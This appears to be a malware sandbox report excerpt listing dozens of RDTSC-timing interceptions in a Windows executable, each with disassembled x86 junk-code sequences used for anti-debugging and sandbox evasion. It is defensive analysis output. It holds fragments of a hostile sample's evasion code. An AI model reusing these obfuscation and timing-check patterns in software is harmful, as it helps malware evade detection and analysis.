                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790B02 second address: 790B69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F402CC7E508h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e and ecx, dword ptr [ebp+122D1B14h] 0x00000034 push 0000001Eh 0x00000036 sbb cl, 00000061h 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e jbe 00007F402CC7E506h 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F402CC7E518h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790B69 second address: 790B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F402CDD4F71h 0x0000000e pushad 0x0000000f jmp 00007F402CDD4F63h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790F2D second address: 790F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C589C second address: 7C58B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C58B7 second address: 7C58BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C5CA4 second address: 7C5CD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 jbe 00007F402CDD4F68h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F402CDD4F5Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C5DF7 second address: 7C5E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop edi 0x0000000b je 00007F402CC7E54Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C5E0C second address: 7C5E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C5E10 second address: 7C5E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F402CC7E519h 0x0000000f jmp 00007F402CC7E50Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C5FA9 second address: 7C5FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F402CDD4F5Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jnp 00007F402CDD4F5Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CBDB2 second address: 7CBDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74659F second address: 7465AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7465AA second address: 7465CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jnc 00007F402CC7E511h 0x00000010 push ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7465CA second address: 7465D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CACBA second address: 7CACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CACBE second address: 7CACC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CAF9B second address: 7CAFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F402CC7E506h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CAFA6 second address: 7CAFAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CAFAD second address: 7CAFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CAFB8 second address: 7CAFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CB7E6 second address: 7CB826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F402CC7E511h 0x0000000f push edi 0x00000010 pop edi 0x00000011 js 00007F402CC7E506h 0x00000017 popad 0x00000018 jp 00007F402CC7E508h 0x0000001e popad 0x0000001f pushad 0x00000020 js 00007F402CC7E50Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CBC27 second address: 7CBC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CBC2F second address: 7CBC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F402CC7E506h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CBC44 second address: 7CBC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5F9F second address: 7D5FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5FA4 second address: 7D5FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F402CDD4F56h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C63 second address: 7D4C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D595E second address: 7D597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F402CDD4F56h 0x0000000a jmp 00007F402CDD4F62h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D597E second address: 7D599A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F402CC7E506h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F402CC7E50Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D599A second address: 7D59A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C6A second address: 7D5C70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7F4B second address: 7D7F5B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F402CDD4F56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7F5B second address: 7D7F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB23D second address: 7DB241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB241 second address: 7DB277 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F402CC7E508h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F402CC7E50Fh 0x00000013 pushad 0x00000014 jmp 00007F402CC7E516h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DADFA second address: 7DAE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F402CDD4F56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAE06 second address: 7DAE29 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jp 00007F402CC7E513h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAF8E second address: 7DAF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAF92 second address: 7DAFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F402CC7E50Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08AF second address: 7E08D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CDD4F63h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08D0 second address: 7E08D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08D4 second address: 7E08D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08D8 second address: 7E08F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E513h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790954 second address: 79099D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push ecx 0x00000009 or dword ptr [ebp+122D1911h], eax 0x0000000f pop edx 0x00000010 mov ebx, dword ptr [ebp+12481ACCh] 0x00000016 mov edx, dword ptr [ebp+122D2A0Fh] 0x0000001c add eax, ebx 0x0000001e cld 0x0000001f nop 0x00000020 pushad 0x00000021 jnp 00007F402CDD4F58h 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a jmp 00007F402CDD4F66h 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79099D second address: 7909CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F402CC7E508h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f call 00007F402CC7E512h 0x00000014 mov edi, dword ptr [ebp+122D2983h] 0x0000001a pop ecx 0x0000001b push 00000004h 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909CD second address: 7909E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909E3 second address: 7909E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0B7E second address: 7E0B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0B89 second address: 7E0B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E49A1 second address: 7E49A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E49A6 second address: 7E49AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E42DE second address: 7E42E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E472B second address: 7E4748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E513h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4748 second address: 7E474C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AE4 second address: 7E7AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AEA second address: 7E7B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F402CDD4F5Eh 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F402CDD4F56h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7C42 second address: 7E7C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7EC7 second address: 7E7ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7ECB second address: 7E7ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E80BC second address: 7E80C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E80C0 second address: 7E80C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E83CA second address: 7E83CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0D7D second address: 7F0D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEEF2 second address: 7EEF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F402CDD4F5Bh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEF0B second address: 7EEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEF0F second address: 7EEF31 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F402CDD4F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F402CDD4F63h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F402CDD4F5Bh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF07D second address: 7EF0A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F402CC7E50Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF0A6 second address: 7EF0BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F402CDD4F62h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF3B1 second address: 7EF3DE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CC7E517h 0x00000011 jmp 00007F402CC7E50Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC52 second address: 7EFC6F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F402CDD4F67h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC6F second address: 7EFC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F402CC7E508h 0x00000010 jmp 00007F402CC7E50Ch 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFF91 second address: 7EFFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F402CDD4F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CDD4F5Ch 0x00000011 jmp 00007F402CDD4F60h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFFB9 second address: 7EFFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0798 second address: 7F079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0A84 second address: 7F0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2387 second address: 7F238D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752101 second address: 75210D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F402CC7E506h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75210D second address: 752113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA985 second address: 7FA98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA98B second address: 7FA9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CDD4F66h 0x00000009 popad 0x0000000a jmp 00007F402CDD4F5Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA9B5 second address: 7FA9C8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F402CC7E50Eh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAB47 second address: 7FAB68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAE9D second address: 7FAEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEA2 second address: 7FAEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEA8 second address: 7FAEAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB01D second address: 7FB027 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB027 second address: 7FB02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB02F second address: 7FB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8035C1 second address: 8035F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E50Ah 0x00000009 popad 0x0000000a ja 00007F402CC7E519h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F402CC7E506h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8035F5 second address: 8035F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80173D second address: 801741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801741 second address: 80174D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007F402CDD4F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80174D second address: 80175D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F402CC7E512h 0x00000008 jp 00007F402CC7E506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80188E second address: 801892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
